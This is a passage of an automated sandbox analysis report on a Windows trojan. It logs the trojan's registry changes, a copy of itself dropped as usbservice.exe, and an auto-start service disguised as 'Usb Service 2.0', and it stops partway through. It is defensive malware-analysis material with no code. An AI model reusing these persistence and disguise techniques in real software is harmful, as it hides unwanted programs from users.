Analysis Report for 647a10168f2ab6afbbe28fc59926f99e

Comment on this report

Summary:

Description	Risk
Autostart capabilities: This executable registers processes to be executed at system start. This could result in unwanted actions to be performed automatically.
Changes security settings of Internet Explorer: This system alteration could seriously affect safety surfing the World Wide Web.
Creates files in the Windows system directory: Malware often keeps copies of itself in the Windows directory to stay undetected by users.
Joins IRC Network: The executable connects to an IRC network, most probably functioning as a zombie in a botnet.
Performs Address Scan: The executable scans a range of IP Addresses. In most cases these scans identify more potential vulnerable targets.
Performs File Modification and Destruction: The executable modifies and destructs files which are not temporary.
Spawns Processes: The executable produces processes during the execution.
Performs Registry Activities: The executable reads and modifies registry values. It may also create and monitor registry keys.

Table of Contents
expand all	collapse all
General information sample.exe C:\sample.exe Primary Analysis Subject General Information a) Registry Activities b) File Activities c) Process Activities d) Other Activities sample.exe C:\sample.exe Started by sample.exe General Information a) Registry Activities b) File Activities c) Windows Service Activities d) Process Activities e) Other Activities services.exe C:\WINDOWS\system32\services.exe NtConnectPort(\RPC Control\ntsvcs was called. General Information a) Registry Activities b) File Activities c) Process Activities usbservice.exe C:\WINDOWS\usbservice.exe Started by services.exe General Information a) Registry Activities b) File Activities c) Process Activities d) Other Activities usbservice.exe C:\WINDOWS\usbservice.exe Started by usbservice.exe General Information a) Registry Activities b) File Activities c) Windows Service Activities d) Process Activities e) Network Activities

1. General Information

	- Information about Anubis' invocation

Time needed:	241 s
Report created:	03/20/09, 15:13:01 UTC
Termination reason:	Timeout
Program version:	1.67.0

1.a) - Network Activity

	- Unknown UDP Traffic:

from ANUBIS:1025 to 192.168.0.1:53

State: Normal establishment and termination - Transferred outbound Bytes: 36 - Transferred inbound Bytes: 126

from ANUBIS:1025 to 192.168.0.1:53

State: Normal establishment and termination - Transferred outbound Bytes: 30 - Transferred inbound Bytes: 127

2. sample.exe

	- General information about this executable

Analysis Reason:	Primary Analysis Subject
Filename:	sample.exe
MD5:	647a10168f2ab6afbbe28fc59926f99e
SHA-1:	1f26be732b65825855d444dc40cbc29c57c3a887
File Size:	172032 Bytes
Command Line:	"C:\sample.exe"
Process-status at analysis end:	dead
Exit Code:	0

	- Load-time Dlls

Module Name	Base Address	Size
C:\WINDOWS\system32\ntdll.dll	0x7C900000	0x000AF000
C:\WINDOWS\system32\kernel32.dll	0x7C800000	0x000F6000
C:\WINDOWS\system32\MSVBVM60.DLL	0x73420000	0x00153000
C:\WINDOWS\system32\USER32.dll	0x7E410000	0x00091000
C:\WINDOWS\system32\GDI32.dll	0x77F10000	0x00049000
C:\WINDOWS\system32\ADVAPI32.dll	0x77DD0000	0x0009B000
C:\WINDOWS\system32\RPCRT4.dll	0x77E70000	0x00092000
C:\WINDOWS\system32\Secur32.dll	0x77FE0000	0x00011000
C:\WINDOWS\system32\ole32.dll	0x774E0000	0x0013D000
C:\WINDOWS\system32\msvcrt.dll	0x77C10000	0x00058000
C:\WINDOWS\system32\OLEAUT32.dll	0x77120000	0x0008B000
C:\WINDOWS\system32\IMM32.DLL	0x76390000	0x0001D000

	- Run-time Dlls

Module Name	Base Address	Size
C:\WINDOWS\system32\MSCTF.dll	0x74720000	0x0004C000
C:\WINDOWS\system32\msctfime.ime	0x755C0000	0x0002E000
C:\WINDOWS\system32\version.dll	0x77C00000	0x00008000
C:\WINDOWS\system32\SXS.DLL	0x7E720000	0x000B0000

	- Ikarus Virus Scanner

Trojan.Win32.Agent2 (Sig-Id:26204189)

2.a) sample.exe - Registry Activities

	- Registry Values Read:

Key	Name	Value	Times
HKLM\SOFTWARE\Microsoft\CTF\SystemShared\	CUAS	0	1
HKLM\Software\Microsoft\CTF\SystemShared	CUAS	0	1
HKLM\Software\Microsoft\Windows NT\CurrentVersion\IMM	Ime File	msctfime.ime	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers	AuthenticodeEnabled	0	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers	DefaultLevel	262144	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers	PolicyScope	0	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers	TransparentEnabled	1	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{349d35ab-37b5-462f-9b89-edd5fbde1328}	HashAlg	32771	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{349d35ab-37b5-462f-9b89-edd5fbde1328}	ItemData	0x5eab304f957a49896a006c1c31154015	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{349d35ab-37b5-462f-9b89-edd5fbde1328}	ItemSize	779	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{349d35ab-37b5-462f-9b89-edd5fbde1328}	SaferFlags	0	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{7fb9cd2e-3076-4df9-a57b-b813f72dbb91}	HashAlg	32771	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{7fb9cd2e-3076-4df9-a57b-b813f72dbb91}	ItemData	0x67b0d48b343a3fd3bce9dc646704f394	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{7fb9cd2e-3076-4df9-a57b-b813f72dbb91}	ItemSize	517	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{7fb9cd2e-3076-4df9-a57b-b813f72dbb91}	SaferFlags	0	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{81d1fe15-dd9d-4762-b16d-7c29ddecae3f}	HashAlg	32771	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{81d1fe15-dd9d-4762-b16d-7c29ddecae3f}	ItemData	0x327802dcfef8c893dc8ab006dd847d1d	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{81d1fe15-dd9d-4762-b16d-7c29ddecae3f}	ItemSize	918	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{81d1fe15-dd9d-4762-b16d-7c29ddecae3f}	SaferFlags	0	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{94e3e076-8f53-42a5-8411-085bcc18a68d}	HashAlg	32771	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{94e3e076-8f53-42a5-8411-085bcc18a68d}	ItemData	0xbd9a2adb42ebd8560e250e4df8162f67	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{94e3e076-8f53-42a5-8411-085bcc18a68d}	ItemSize	229	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{94e3e076-8f53-42a5-8411-085bcc18a68d}	SaferFlags	0	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{dc971ee5-44eb-4fe4-ae2e-b91490411bfc}	HashAlg	32771	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{dc971ee5-44eb-4fe4-ae2e-b91490411bfc}	ItemData	0x386b085f84ecf669d36b956a22c01e80	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{dc971ee5-44eb-4fe4-ae2e-b91490411bfc}	ItemSize	370	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{dc971ee5-44eb-4fe4-ae2e-b91490411bfc}	SaferFlags	0	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Paths\{dda3f824-d8cb-441b-834d-be2efd2c1a33}	ItemData	%HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\Cache%OLK*	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Paths\{dda3f824-d8cb-441b-834d-be2efd2c1a33}	SaferFlags	0	1
HKLM\System\CurrentControlSet\Control\Nls\Codepage	932	c_932.nls	1
HKLM\System\CurrentControlSet\Control\Nls\Codepage	936	c_936.nls	1
HKLM\System\CurrentControlSet\Control\Nls\Codepage	949	c_949.nls	1
HKLM\System\CurrentControlSet\Control\Nls\Codepage	950	c_950.nls	1
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders	Cache	C:\Documents and Settings\user\Local Settings\Temporary Internet Files	1

2.b) sample.exe - File Activities

	- Device Control Communication:

File	Control Code	Times
unnamed file	0x00390008	7

	- Memory Mapped Files:

File Name

C:\WINDOWS\system32\MSCTF.dll

C:\WINDOWS\system32\SXS.DLL

C:\WINDOWS\system32\msctfime.ime

C:\WINDOWS\system32\netmsg.dll

C:\WINDOWS\system32\rpcss.dll

C:\sample.exe

2.c) sample.exe - Process Activities

	- Processes Created:

Executable	Command Line
C:\sample.exe
	C:\\sample.exe

	- Remote Threads Created:

Affected Process

C:\sample.exe

	- Foreign Memory Regions Read:

Process: C:\sample.exe

	- Foreign Memory Regions Written:

Process: C:\sample.exe

2.d) sample.exe - Other Activities

	- Mutexes Created:

CTF.Asm.MutexDefaultS-1-5-21-1229272821-1004336348-527237240-1003

CTF.Compart.MutexDefaultS-1-5-21-1229272821-1004336348-527237240-1003

CTF.LBES.MutexDefaultS-1-5-21-1229272821-1004336348-527237240-1003

CTF.Layouts.MutexDefaultS-1-5-21-1229272821-1004336348-527237240-1003

CTF.TMD.MutexDefaultS-1-5-21-1229272821-1004336348-527237240-1003

CTF.TimListCache.FMPDefaultS-1-5-21-1229272821-1004336348-527237240-1003MUTEX.DefaultS-1-5-21-1229272821-1004336348-527237240-1003

	- Windows SEH exceptions:

Description	Times
Exception 0xc000008f (STATUS_FLOAT_INEXACT_RESULT) at 0x7c812aeb	18

3. sample.exe

	- General information about this executable

Analysis Reason:	Started by sample.exe
Filename:	sample.exe
MD5:	647a10168f2ab6afbbe28fc59926f99e
SHA-1:	1f26be732b65825855d444dc40cbc29c57c3a887
File Size:	172032 Bytes
Command Line:	C:\\sample.exe
Process-status at analysis end:	dead
Exit Code:	1

	- Load-time Dlls

Module Name	Base Address	Size
C:\WINDOWS\system32\ntdll.dll	0x7C900000	0x000AF000
C:\WINDOWS\system32\kernel32.dll	0x7C800000	0x000F6000
C:\WINDOWS\system32\WSOCK32.dll	0x71AD0000	0x00009000
C:\WINDOWS\system32\WS2_32.dll	0x71AB0000	0x00017000
C:\WINDOWS\system32\ADVAPI32.dll	0x77DD0000	0x0009B000
C:\WINDOWS\system32\RPCRT4.dll	0x77E70000	0x00092000
C:\WINDOWS\system32\Secur32.dll	0x77FE0000	0x00011000
C:\WINDOWS\system32\msvcrt.dll	0x77C10000	0x00058000
C:\WINDOWS\system32\WS2HELP.dll	0x71AA0000	0x00008000
C:\WINDOWS\system32\SHELL32.dll	0x7C9C0000	0x00817000
C:\WINDOWS\system32\GDI32.dll	0x77F10000	0x00049000
C:\WINDOWS\system32\USER32.dll	0x7E410000	0x00091000
C:\WINDOWS\system32\SHLWAPI.dll	0x77F60000	0x00076000
C:\WINDOWS\system32\IMM32.DLL	0x76390000	0x0001D000
C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.5512_x-ww_35d4ce83\comctl32.dll	0x773D0000	0x00103000
C:\WINDOWS\system32\comctl32.dll	0x5D090000	0x0009A000

	- Run-time Dlls

Module Name	Base Address	Size
C:\WINDOWS\system32\Normaliz.dll	0x003B0000	0x00009000
C:\WINDOWS\system32\odbcint.dll	0x00D50000	0x00017000
C:\WINDOWS\system32\iertutil.dll	0x42990000	0x00045000
C:\WINDOWS\system32\wininet.dll	0x42C10000	0x000CF000
C:\WINDOWS\system32\netapi32.dll	0x5B860000	0x00055000
C:\WINDOWS\system32\mpr.dll	0x71B20000	0x00012000
C:\WINDOWS\system32\icmp.dll	0x74290000	0x00004000
C:\WINDOWS\system32\odbc32.dll	0x74320000	0x0003D000
C:\WINDOWS\system32\comdlg32.dll	0x763B0000	0x00049000
C:\WINDOWS\system32\psapi.dll	0x76BF0000	0x0000B000
C:\WINDOWS\system32\iphlpapi.dll	0x76D60000	0x00019000
C:\WINDOWS\system32\dnsapi.dll	0x76F20000	0x00027000

	- Ikarus Virus Scanner

Trojan.Win32.Agent2 (Sig-Id:26204189)

3.a) sample.exe - Registry Activities

	- Registry Values Modified:

Key	Name	New Value
HKLM\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Shell Extensions	GON	C:\sample.exe
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders	Cache	C:\Documents and Settings\user\Local Settings\Temporary Internet Files
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders	Cookies	C:\Documents and Settings\user\Cookies
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders	History	C:\Documents and Settings\user\Local Settings\History

	- Registry Values Read:

Key	Name	Value	Times
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon	Shell	Explorer.exe	2
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings	UrlEncoding	0x00000000	2
HKLM\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content	PerUserItem	1	1
HKLM\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies	PerUserItem	1	1
HKLM\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History	PerUserItem	1	1
HKLM\System\CurrentControlSet\Services\Tcpip\Parameters	UseDomainNameDevolution	1	1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters	WinSock_Registry_Version	2.0	2
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5	Num_Catalog_Entries	3	1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5	Serial_Access_Num	4	2
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000001	DisplayString	Tcpip	4
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000001	Enabled	1	1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000001	LibraryPath	%SystemRoot%\System32\mswsock.dll	2
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000001	ProviderId	0x409d05229e7ecf11ae5a00aa00a7112b	1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000001	StoresServiceClassInfo	0	1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000001	SupportedNameSpace	12	1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000001	Version	0	1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000002	DisplayString	NTDS	4
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000002	Enabled	1	1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000002	LibraryPath	%SystemRoot%\System32\winrnr.dll	2
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000002	ProviderId	0xee37263b80e5cf11a55500c04fd8d4ac	1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000002	StoresServiceClassInfo	0	1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000002	SupportedNameSpace	32	1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000002	Version	0	1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000003	DisplayString	Network Location Awareness (NLA) Namespace	4
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000003	Enabled	1	1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000003	LibraryPath	%SystemRoot%\System32\mswsock.dll	2
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000003	ProviderId	0x3a244266a83ba64abaa52e0bd71fdd83	1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000003	StoresServiceClassInfo	0	1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000003	SupportedNameSpace	15	1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000003	Version	0	1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9	Next_Catalog_Entry_ID	1012	1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9	Num_Catalog_Entries	11	1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9	Serial_Access_Num	4	2
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000001	PackedCatalogItem	%SystemRoot%\system32\mswsock.	1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000002	PackedCatalogItem	%SystemRoot%\system32\mswsock.	1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000003	PackedCatalogItem	%SystemRoot%\system32\mswsock.	1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000004	PackedCatalogItem	%SystemRoot%\system32\rsvpsp.d	1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000005	PackedCatalogItem	%SystemRoot%\system32\rsvpsp.d	1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000006	PackedCatalogItem	%SystemRoot%\system32\mswsock.	1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000007	PackedCatalogItem	%SystemRoot%\system32\mswsock.	1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000008	PackedCatalogItem	%SystemRoot%\system32\mswsock.	1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000009	PackedCatalogItem	%SystemRoot%\system32\mswsock.	1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000010	PackedCatalogItem	%SystemRoot%\system32\mswsock.	1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000011	PackedCatalogItem	%SystemRoot%\system32\mswsock.	1
HKLM\System\Setup	SystemSetupInProgress	0	1
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings	CertificateRevocation	0	1
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings	DisableCachingOfSSLPages	0	1
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings	EnableHttp1_1	1	1
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings	EnableNegotiate	1	1
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings	MimeExclusionListForCache	multipart/mixed multipart/x-mixed-replace multipart/x-byteranges	4
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings	SecureProtocols	160	1
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings	WarnOnPost	0x01000000	1
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings	WarnOnZoneCrossing	0	1
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders	Cache	%USERPROFILE%\Local Settings\Temporary Internet Files	1
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders	Cookies	%USERPROFILE%\Cookies	1
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders	History	%USERPROFILE%\Local Settings\History	1
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache	Signature	Client UrlCache MMF Ver 5.2	2
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content	CacheLimit	163410	1
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content	CachePrefix		2
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies	CacheLimit	8192	1
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies	CachePrefix	Cookie:	2
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012008051620080517	CacheLimit	8192	1
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012008051620080517	CacheOptions	11	1
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012008051620080517	CachePath	%USERPROFILE%\Local Settings\History\History.IE5\MSHist012008051620080517	2
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012008051620080517	CachePrefix	:2008051620080517:	2
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012008051620080517	CacheRepair	0	1
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\UserData	CacheLimit	1000	1
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\UserData	CacheOptions	8	1
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\UserData	CachePath	%USERPROFILE%\UserData	2
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\UserData	CachePrefix	UserData	2
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\UserData	CacheRepair	0	1
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\feedplat	CacheLimit	8192	1
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\feedplat	CacheOptions	0	1
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\feedplat	CachePath	%USERPROFILE%\Local Settings\Application Data\Microsoft\Feeds Cache	2
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\feedplat	CachePrefix	feedplat:	2
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\feedplat	CacheRepair	0	1
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History	CacheLimit	8192	1
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History	CachePrefix	Visited:	2

	- Monitored Registry Keys:

Key Name	Watch subtree	Notify Filter	Count
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5	0	Key Change	1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9	0	Key Change	1
HKLM\system\CurrentControlSet\control\NetworkProvider\HwOrder	0	Value Change	1

3.b) sample.exe - File Activities

	- Files Created:

C:\WINDOWS\usbservice.exe

	- Files Modified:

C:\WINDOWS\usbservice.exe

WMIDataDevice

\Device\Ip

\Device\Tcp

	- Device Control Communication:

File	Control Code	Times
WMIDataDevice	0x0022414C	2
WMIDataDevice	0x00228144	2
\Device\Tcp	0x00120003	6
\Device\KsecDD	0x00390008	1

	- Memory Mapped Files:

File Name

C:\WINDOWS\system32\dnsapi.dll

C:\WINDOWS\system32\icmp.dll

C:\WINDOWS\system32\iphlpapi.dll

C:\WINDOWS\system32\odbc32.dll

C:\WINDOWS\system32\odbcint.dll

C:\WINDOWS\system32\psapi.dll

C:\sample.exe

3.c) sample.exe - Windows Service Activities

	- Services Started:

Usb Service 2.0

	- Services Created:

Name	Type	Path
Usb Service 2.0	SERVICE_AUTO_START	"C:\WINDOWS\usbservice.exe"

	- Services Changed:

Usb Service 2.0

3.d) sample.exe - Process Activities

	- Thread Overview:

Time	Number of threads
After 55 seconds	1

3.e) sample.exe - Other Activities

	- Windows SEH exceptions:

Description	Times
Exception 0x6 at 0x7c812aeb	1

4. services.exe

	- General information about this executable

Analysis Reason:	NtConnectPort(\RPC Control\ntsvcs was called.
Filename:	services.exe
MD5:	0e776ed5f7cc9f94299e70461b7b8185
SHA-1:	cb5a33cec4c7b8ef4bd5dc8c241005b66b26cbbf
File Size:	108544 Bytes
Command Line:	C:\WINDOWS\system32\services.exe
Process-status at analysis end:	alive
Exit Code:	0

	- Load-time Dlls

Module Name	Base Address	Size
C:\WINDOWS\system32\ntdll.dll	0x7C900000	0x000AF000
C:\WINDOWS\system32\kernel32.dll	0x7C800000	0x000F6000
C:\WINDOWS\system32\ADVAPI32.dll	0x77DD0000	0x0009B000
C:\WINDOWS\system32\RPCRT4.dll	0x77E70000	0x00092000
C:\WINDOWS\system32\Secur32.dll	0x77FE0000	0x00011000
C:\WINDOWS\system32\msvcrt.dll	0x77C10000	0x00058000
C:\WINDOWS\system32\NCObjAPI.DLL	0x5F770000	0x0000C000
C:\WINDOWS\system32\MSVCP60.dll	0x76080000	0x00065000
C:\WINDOWS\system32\SCESRV.dll	0x7DBD0000	0x00051000
C:\WINDOWS\system32\AUTHZ.dll	0x776C0000	0x00012000
C:\WINDOWS\system32\USER32.dll	0x7E410000	0x00091000
C:\WINDOWS\system32\GDI32.dll	0x77F10000	0x00049000
C:\WINDOWS\system32\USERENV.dll	0x769C0000	0x000B4000
C:\WINDOWS\system32\umpnpmgr.dll	0x7DBA0000	0x00021000
C:\WINDOWS\system32\WINSTA.dll	0x76360000	0x00010000
C:\WINDOWS\system32\NETAPI32.dll	0x5B860000	0x00055000
C:\WINDOWS\system32\ShimEng.dll	0x5CB70000	0x00026000
C:\WINDOWS\AppPatch\AcAdProc.dll	0x47260000	0x0000F000
C:\WINDOWS\system32\IMM32.DLL	0x76390000	0x0001D000
C:\WINDOWS\system32\Apphelp.dll	0x77B40000	0x00022000
C:\WINDOWS\system32\VERSION.dll	0x77C00000	0x00008000
C:\WINDOWS\system32\eventlog.dll	0x77B70000	0x00011000
C:\WINDOWS\system32\PSAPI.DLL	0x76BF0000	0x0000B000
C:\WINDOWS\system32\WS2_32.dll	0x71AB0000	0x00017000
C:\WINDOWS\system32\WS2HELP.dll	0x71AA0000	0x00008000
C:\WINDOWS\system32\wtsapi32.dll	0x76F50000	0x00008000

4.a) services.exe - Registry Activities

	- Registry Keys Created:

HKLM\System\CurrentControlSet\Services\Usb Service 2.0

HKLM\System\CurrentControlSet\Services\Usb Service 2.0\Security

HKLM\System\CurrentControlSet\Enum\Root\LEGACY_TAPISRV\0000\Control

HKLM\System\CurrentControlSet\Enum\Root\LEGACY_RASMAN\0000\Control

	- Registry Values Modified:

Key	Name	New Value
HKLM\SYSTEM\CONTROLSET001\CONTROL\SERVICECURRENT		9
HKLM\System\CurrentControlSet\Enum\Root\LEGACY_RASMAN\0000\Control	ActiveService	RasMan
